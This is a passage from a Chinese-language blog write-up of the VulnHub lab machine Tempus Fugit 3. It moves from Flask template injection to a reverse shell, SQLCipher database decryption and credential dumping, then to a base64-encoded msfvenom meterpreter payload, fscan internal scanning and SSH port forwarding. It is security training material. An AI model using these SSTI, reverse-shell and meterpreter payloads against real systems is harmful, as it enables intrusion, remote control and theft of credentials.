news 2026/7/7 6:31:19

从SSTI模板注入到docker容器内网渗透:靶机练习之Tempus_fugit3

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
从SSTI模板注入到docker容器内网渗透:靶机练习之Tempus_fugit3

靶机提示

sstisqlite文件破解内网渗透容器

靶机下载

https://download.vulnhub.com/tempusfugit/Tempus-Fugit-3.ova

信息搜集

nmap -sT --min-rate 10000 -p- 192.168.8.250

很简单的信息,只有一个web页面

SSTI模板注入漏洞

无意中发现404似乎都是有个统一的拦截页面

{{2*2}}}

直接注入payload,果然存在ssti漏洞

先查看配置,定位服务端模板版本

{{config}}

根据特征推断服务端是flask

同时base64解码拿到第一个flag

flask ssti注入payload

{{ request.application.__globals__.__builtins__.__import__('os').popen('id').read() }}

成功回显

反弹shell

{{ request.application.__globals__.__builtins__.__import__('os').popen('bash -c "/bin/bash -i >& /dev/tcp/192.168.8.251/4444 0>&1"').read() }}

sqlite 数据窃取

app.py文件中发现了第一个flag,以及数据库密码,

pragma key='SecretssecretsSecrets...'

并且用的时sqlite数据库
SQLite 是一个嵌入式的、进程内(in-process)、无服务器、零配置、事务性的 SQL 数据库引擎,它只在本地生成一个文件

顺着app.py源码指示的路径也发现了db文件

sqlite交互

登录

sqlcipher db2.db --interactive

输入密码

PRAGMA key = 'SecretssecretsSecrets...';

hugh-janus|S0secretPassW0rd anita-hanjaab|ssdf%dg5xc clee-torres|asRtesa#2s RmxhZzN7IEhleSwgcmVhZGluZyBzZWNyZXRzICB9|

拿到第三个flag

后台源码泄露


源码里面拿到flag2


提权

想进一步利用时发现,反弹shell是受限的

推断可能是容器shell

拿到shell后无法执行查看网络的命令,同时也没有curl/wget等命令,再联想到端口服务探测时,发现80端口只是nginx服务,猜测可能是docker容器

摆脱受限容器

生成一个不依赖任何运行时(curl/wget/python)的纯二进制后门

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.8.251 LPORT=6666 -f elf -o ex.elf

将 ELF 二进制转为 Base64 文本传输
-w0禁止换行

cat ex.elf| base64 -w0

在靶机生成payload

echo 'f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgAaCsCoCPtRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==' |base64 -d > ex.elf

msf启动监听

拿到meterpreter shell

内网渗透

先拿到内网ip

上传fscan

meterpreter > upload /root/tools/fscan

进入shell

fscan -h 192.168.100.0/24

发现了192.168.100.1

端口扫描

./fscan -h 192.168.100.0/24 -p 1-65535 -t 50

开了34193端口和80端口

端口转发

把内网端口通过ssh隧道转发到kali

ssh -N -R 5555:192.168.100.1:80 root@192.168.8.251

ps靶机环境似乎有问题,卡在这边整了很久,看了一下wp内网的192.168.100.1机器的还有个443端口,但是靶机的443似乎没有启动起来,暂时先这样。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/7 6:30:04

YOLOv8蜜蜂识别检测系统(项目源码+YOLO数据集+模型权重+UI界面+python+深度学习+环境配置+目标检测)

摘要 随着深度学习技术的快速发展与计算机视觉算法的持续突破,目标检测技术已经在农业智能化领域展现出广阔的应用前景。蜜蜂作为自然界中最重要的授粉昆虫之一,其种群数量变化和行为活动规律直接关系到农业生态系统的稳定性和农作物的产量品质。传统的…

作者头像 李华
网站建设 2026/7/7 6:29:31

3步掌握WebODM:免费开源的无人机图像处理终极指南

3步掌握WebODM:免费开源的无人机图像处理终极指南 【免费下载链接】WebODM User-friendly, commercial-grade software for processing aerial imagery. ✈️ Download it for free! 项目地址: https://gitcode.com/gh_mirrors/we/WebODM 想要将无人机航拍图…

作者头像 李华
网站建设 2026/7/7 6:26:50

给 Claude Code 布置任务,它为什么总是理解错——我找到原因了

你的任务描述,可能少了这些东西有个反直觉的现象:越是有经验的工程师,越容易在给 Coding Agent 布置任务时出问题。原因是:我们已经习惯了隐式传递信息。和同事沟通时,「加个用户登录功能」这几个字背后有大量你们共享…

作者头像 李华
网站建设 2026/7/7 6:23:43

Claude API 长上下文处理:应用场景、成本分析与实战指南

一、长上下文能力概览Claude API 支持 200K tokens 的长上下文窗口,理论上可处理约 15 万字英文或 5-8 万字中文内容。当前可用的主流模型包括:claude-opus-4-8:性能最强,适合复杂推理任务claude-sonnet-5:性价比最优&…

作者头像 李华
网站建设 2026/7/7 6:20:48

图像锐度评分算法实战:基于OpenCV与Python实现自动对焦评价函数

图像锐度评分算法实战:基于OpenCV与Python实现自动对焦评价函数在数字摄影和计算机视觉领域,自动对焦技术是确保图像清晰度的核心环节。如何让相机或智能设备快速准确地找到最佳对焦点?关键在于选择高效可靠的图像锐度评价算法。本文将深入解…

作者头像 李华
网站建设 2026/7/7 6:19:39

OpenBMC:systemd 服务与启动流程

1. 为什么 OpenBMC 离不开 systemd OpenBMC 本质上是运行在 BMC 芯片上的 Linux 系统。它不是一个单独的管理程序,而是由大量服务共同组成的系统。 这些服务包括: 网络服务D-Bus 服务bmcweb传感器服务电源控制服务风扇控制服务日志服务固件升级服务用户管…

作者头像 李华